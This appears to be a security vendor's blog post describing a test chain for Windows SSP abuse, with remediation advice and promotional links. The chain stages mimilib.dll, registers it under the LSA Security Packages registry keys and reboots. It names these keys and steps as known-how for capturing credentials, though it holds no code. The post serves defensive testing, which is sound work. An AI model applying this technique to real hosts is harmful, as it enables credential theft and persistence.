Is my host protected against SSP abuse?

This chain will stage a mimilib.dll file and import it into Windows Security Support Provider, allowing it to run custom dll's on boot.

Is my host protected against SSP abuse?

SSPs (Security Support Providers) are dynamic link libraries (DLLs) that are loaded by the Local Security Authority (LSA) process in Windows operating systems at system startup. SSPs provide security-related services to Windows and are used to implement various authentication protocols, such as NTLM and Kerberos, which are used to validate user credentials and secure network communications. SSPs also have access to encrypted and plaintext passwords stored in Windows, such as domain passwords or smart card PINs, making them a prime target for attackers looking to steal sensitive information.

To modify the SSP configuration, an adversary can manipulate the relevant Registry keys, namely HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. By adding new SSPs to these keys, the attacker can ensure that their chosen DLL, such as mimilib.dll, is loaded during the next boot-up or when the AddSecurityPackage Windows API function is called.

Once loaded into the LSA process, the mimilib.dll file can perform a range of malicious activities. For example, it can capture user credentials, log keystrokes, and even perform remote code execution. This poses a significant risk to the security of the affected system, as well as any sensitive data stored on it.

Testing

Execute Is my host protected against SSP abuse? in Operator on each host in your environment to test if you are vulnerable.

This chain will stage a mimilib.dll file and import it into Windows Security Support Provider, allowing it to run custom dll's on boot.

Remediation

Defending against SSP injection attacks can be challenging, as attackers can manipulate the Windows Registry and modify the SSP configuration to load malicious DLLs during system startup. However, monitoring the relevant Registry keys HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages for suspicious activity could prove useful. You can use tools like Sysmon or PowerShell to monitor these keys and receive alerts when changes are made.

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.preludesecurity.com/products/operator
Try out Prelude Build: https://platform.preludesecurity.com/build
Try out Prelude Detect: https://www.preludesecurity.com/products/detect
See the latest kill chain and TTP Releases: https://chains.prelude.org
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://www.preludesecurity.com/blog
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: https://twitter.com/privateducky
Alex: https://twitter.com/khyberspache
Octavia: https://twitter.com/VVX7
Waseem: https://twitter.com/gerbsec
Robin: https://twitter.com/bfuzzy1

Source: https://feed.prelude.org
Read more

Execute this chain

Download Operator (1.7.1)
Learn about Operator

TTPs

Stage mimilib.dll
add mimilib to reg
Reboot the machine

Tags

destructive